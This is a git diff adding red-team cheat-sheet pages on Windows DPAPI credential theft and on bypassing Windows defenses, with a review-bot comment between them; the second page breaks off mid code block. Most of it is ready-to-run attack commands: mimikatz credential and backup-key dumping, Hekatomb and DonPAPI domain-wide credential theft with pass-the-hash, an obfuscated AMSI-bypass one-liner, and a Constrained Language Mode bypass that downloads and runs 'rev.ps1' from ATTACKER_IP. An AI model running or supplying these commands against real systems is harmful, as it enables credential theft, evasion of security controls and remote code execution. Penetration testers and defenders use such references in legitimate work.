@@ -0,0 +1,100 @@ +# Windows - DPAPI + +> On Windows, credentials saved in the Windows Credentials Manager are encrypted using Microsoft's Data Protection API and stored as "blob" files in user AppData folder. + +## Summary + +* [Data Protection API](#data-protection-api) + * [List Credential Files](#list-credential-files) + * [DPAPI LocalMachine Context](#dpapi-localmachine-context) + * [Mimikatz - Credential Manager & DPAPI](#mimikatz---credential-manager--dpapi) + * [Hekatomb - Steal all credentials on domain](#hekatomb---steal-all-credentials-on-domain) + * [DonPAPI - Dumping DPAPI credz remotely](#donpapi---dumping-dpapi-credz-remotely) + + +## Data Protection API + +* Outside of a domain: the user's `password hash` is used to encrypt these "blobs". +* Inside a domain: the `domain controller's master key` is used to encrypt these blobs. + +With the extracted private key of the domain controller, it is possible to decrypt all the blobs, and therefore to recover all the secrets recorded in the Windows identification manager of all the work +stations in the domain. + +```ps1 +vaultcmd /list + +VaultCmd /listcreds:| /all +vaultcmd /listcreds:"Windows Credentials" /all +``` + +### List Credential Files + +```ps1 +dir /a:h C:\Users\username\AppData\Local\Microsoft\Credentials\ +dir /a:h C:\Users\username\AppData\Roaming\Microsoft\Credentials\ + +Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\ +Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\ +``` + + +### DPAPI LocalMachine Context + +The `LocalMachine` context is used to protect data that is intended to be shared across different users or services on a single machine. This means that any user or service running on the machine can access the protected data with the appropriate credentials. 
+ +In contrast, the `CurrentUser` context is used to protect data that is intended to be accessed only by the user who encrypted it, and cannot be accessed by other users or services on the same machine. + +```ps1 +$a = [System.Convert]::FromBase64String("AQAAANCMnd[...]") +$b = [System.Security.Cryptography.ProtectedData]::Unprotect($a, $null, [System.Security.Cryptography.DataProtectionScope]::LocalMachine) +[System.Text.Encoding]::ASCII.GetString($b) +``` + + +### Mimikatz - Credential Manager & DPAPI + +```powershell +# check the folder to find credentials +dir C:\Users\\AppData\Local\Microsoft\Credentials\* + +# check the file with mimikatz +mimikatz dpapi::cred /in:C:\Users\\AppData\Local\Microsoft\Credentials\2647629F5AA74CD934ECD2F88D64ECD0 +# find master key +mimikatz !sekurlsa::dpapi +# use master key +mimikatz dpapi::cred /in:C:\Users\\AppData\Local\Microsoft\Credentials\2647629F5AA74CD934ECD2F88D64ECD0 /masterkey:95664450d90eb2ce9a8b1933f823b90510b61374180ed5063043273940f50e728fe7871169c87a0bba5e0c470d91d21016311727bce2eff9c97445d444b6a17b + +# find and export backup keys +lsadump::backupkeys /system:dc01.lab.local /export +# use backup keys +dpapi::masterkey /in:"C:\Users\\AppData\Roaming\Microsoft\Protect\S-1-5-21-2552734371-813931464-1050690807-1106\3e90dd9e-f901-40a1-b691-84d7f647b8fe" /pvk:ntds_capi_0_d2685b31-402d-493b-8d12-5fe48ee26f5a.pvk +``` + +### Hekatomb - Steal all credentials on domain + +> [Processus-Thief/Hekatomb](https://github.com/Processus-Thief/HEKATOMB) is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers. Finally, it will extract domain controller private key through RPC uses it to decrypt all credentials. 
+ +```python +pip3 install hekatomb +hekatomb -hashes :ed0052e5a66b1c8e942cc9481a50d56 DOMAIN.local/administrator@10.0.0.1 -debug -dnstcp +``` + +![Data in memory](https://github.com/Processus-Thief/HEKATOMB/raw/main/.assets/github1.png) + +### DonPAPI - Dumping DPAPI credz remotely + +* [login-securite/DonPAPI](https://github.com/login-securite/DonPAPI) + +```ps1 +DonPAPI.py domain/user:passw0rd@target +DonPAPI.py --hashes : domain/user@target + +# using domain backup key +dpapi.py backupkeys --export -t domain/user:passw0rd@target_dc_ip +python DonPAPI.py -pvk domain_backupkey.pvk domain/user:passw0rd@domain_network_list +``` + +## References + +* [DPAPI - Extracting Passwords - HackTricks](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords) +* [DON PAPI, OU L’ART D’ALLER PLUS LOIN QUE LE DOMAIN ADMIN - LoginSecurité - CORTO GUEGUEN - 4 MARS 2022](https://www.login-securite.com/2022/03/04/don-papi-ou-lart-daller-plus-loin-que-le-avec-dpapi/) \ No newline at end of file diff --git a/docs/redteam/Windows - Defenses.md b/docs/redteam/Windows - Defenses.md new file mode 100644 index 0000000..d346323 --- /dev/null +++ b/docs/redteam/Windows - Defenses.md 
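Review bot: the two bullets under `## Data Protection API` misdescribe the key hierarchy: a credential blob is decrypted with the user's master key, and domain membership adds a backup copy of that master key recoverable with the domain backup key; the domain controller's key does not encrypt the blobs directly. The hunk's own mimikatz block shows the actual order, since the exported `ntds_capi_*.pvk` is given to `dpapi::masterkey /in:"...\Protect\S-1-5-21-...\3e90dd9e-..." /pvk:...` to recover the master key, and only then does `dpapi::cred /in:... /masterkey:...` decrypt the credential file; reword the bullets to match. Two placeholder problems: `VaultCmd /listcreds:| /all` has lost its argument, and the username segment has dropped out of `dir C:\Users\\AppData\Local\Microsoft\Credentials\*` and the `/in:C:\Users\\AppData\...` paths (most likely an angle-bracket placeholder swallowed by markdown), so use a plain `USERNAME` placeholder that survives rendering. Finally, the Hekatomb block is fenced as `python` but contains shell commands (`pip3 install hekatomb`, `hekatomb -hashes ...`), so retag it to match the other command blocks on the page.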
@@ -0,0 +1,421 @@ +# Windows - Defenses + +## Summary + +* [AppLocker](#applocker) +* [User Account Control](#user-account-control) +* [DPAPI](#dpapi) +* [Powershell](#powershell) + * [Anti Malware Scan Interface](#anti-malware-scan-interface) + * [Just Enough Administration](#just-enough-administration) + * [Contrained Language Mode](#constrained-language-mode) + * [Script Block Logging](#script-block-logging) +* [Protected Process Light](#protected-process-light) +* [Credential Guard](#credential-guard) +* [Event Tracing for Windows](#event-tracing-for-windows) +* [Windows Defender Antivirus](#windows-defender-antivirus) +* [Windows Defender Application Control](#windows-defender-application-control) +* [Windows Defender Firewall](#windows-defender-firewall) +* [Windows Information Protection](#windows-information-protection) + + +## AppLocker + +> AppLocker is a security feature in Microsoft Windows that provides administrators with the ability to control which applications and files users are allowed to run on their systems. The rules can be based on various criteria, such as the file path, file publisher, or file hash, and can be applied to specific users or groups. 
+ +* Enumerate Local AppLocker Effective Policy + ```powershell + PowerView PS C:\> Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections + PowerView PS C:\> Get-AppLockerPolicy -effective -xml + Get-ChildItem -Path HKLM:\SOFTWARE\Policies\Microsoft\Windows\SrpV2\Exe # (Keys: Appx, Dll, Exe, Msi and Script + ``` + +* AppLocker Bypass + * By default, `C:\Windows` is not blocked, and `C:\Windows\Tasks` is writtable by any users + * [api0cradle/UltimateAppLockerByPassList/Generic-AppLockerbypasses.md](https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.md) + * [api0cradle/UltimateAppLockerByPassList/VerifiedAppLockerBypasses.md](https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/VerifiedAppLockerBypasses.md) + * [api0cradle/UltimateAppLockerByPassList/DLL-Execution.md](https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/DLL-Execution.md) + + +## User Account Control + +UAC stands for User Account Control. It is a security feature introduced by Microsoft in Windows Vista and is present in all subsequent versions of the Windows operating system. UAC helps mitigate the impact of malware and helps protect users by asking for permission or an administrator's password before allowing changes to be made to the system that could potentially affect all users of the computer. 
+ +* Check if UAC is enabled + ```ps1 + REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA + ``` +* Check UAC level + ``` + REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin + REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v FilterAdministratorToken + ``` + +| EnableLUA | LocalAccountTokenFilterPolicy | FilterAdministratorToken | Description | +|---|---|---|---| +| 0 | / | / | No UAC | +| 1 | 1 | / | No UAC | +| 1 | 0 | 0 | No UAC for RID 500 | +| 1 | 0 | 1 | UAC for Everyone | + + +* UAC Bypass + * [AutoElevated binary signed by Microsoft](https://www.elastic.co/guide/en/security/current/bypass-uac-via-sdclt.html) - `msconfig`, `sdclt.exe`, `eventvwr.exe`, etc + * [hfiref0x/UACME](https://github.com/hfiref0x/UACME) - Defeating Windows User Account Control + + +## DPAPI + +Refer to [PayloadsAllTheThings/Windows - DPAPI.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20DPAPI.md) + + +## Powershell + +### Anti Malware Scan Interface + +> The Anti-Malware Scan Interface (AMSI) is a Windows API (Application Programming Interface) that provides a unified interface for applications and services to integrate with any anti-malware product installed on a system. The API allows anti-malware solutions to scan files and scripts at runtime, and provides a means for applications to request a scan of specific content. 
+ +Find more AMSI bypass: [Windows - AMSI Bypass.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20AMSI%20Bypass.md) + +```powershell +PS C:\> [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true) +``` + + +### Just Enough Administration + +> Just-Enough-Administration (JEA) is a feature in Microsoft Windows Server that allows administrators to delegate specific administrative tasks to non-administrative users. JEA provides a secure and controlled way to grant limited, just-enough access to systems, while ensuring that the user cannot perform unintended actions or access sensitive information. + +Breaking out if JEA: +* List available cmdlets: `command` +* Look for non-default cmdlets: + ```ps1 + Set-PSSessionConfiguration + Start-Process + New-Service + Add-Computer + ``` + + +### Constrained Language Mode + +Check if we are in a constrained mode: `$ExecutionContext.SessionState.LanguageMode` + +* Bypass using an old Powershell. Powershell v2 doesn't support CLM. + ```ps1 + powershell.exe -version 2 + powershell.exe -version 2 -ExecutionPolicy bypass + powershell.exe -v 2 -ep bypass -command "IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/rev.ps1')" + ``` + +* Bypass when `__PSLockDownPolicy` is used. Just put "System32" somewhere in the path. 
+ ```ps1 + # Enable CLM from the environment + [Environment]::SetEnvironmentVariable('__PSLockdownPolicy', '4', 'Machine') + Get-ChildItem -Path Env: + + # Create a check-mode.ps1 containing your "evil" powershell commands + $mode = $ExecutionContext.SessionState.LanguageMode + write-host $mode + + # Simple bypass, execute inside a System32 folder + PS C:\> C:\Users\Public\check-mode.ps1 + ConstrainedLanguage + + PS C:\> C:\Users\Public\System32\check-mode.ps1 + FullLanguagge + ``` + +* Bypass using COM: [xpn/COM_to_registry.ps1](https://gist.githubusercontent.com/xpn/1e9e879fab3e9ebfd236f5e4fdcfb7f1/raw/ceb39a9d5b0402f98e8d3d9723b0bd19a84ac23e/COM_to_registry.ps1) +* Bypass using your own Powershell DLL: [p3nt4/PowerShdll](https://github.com/p3nt4/PowerShdll) & [iomoath/PowerShx](https://github.com/iomoath/PowerShx) + ```ps1 + rundll32 PowerShdll,main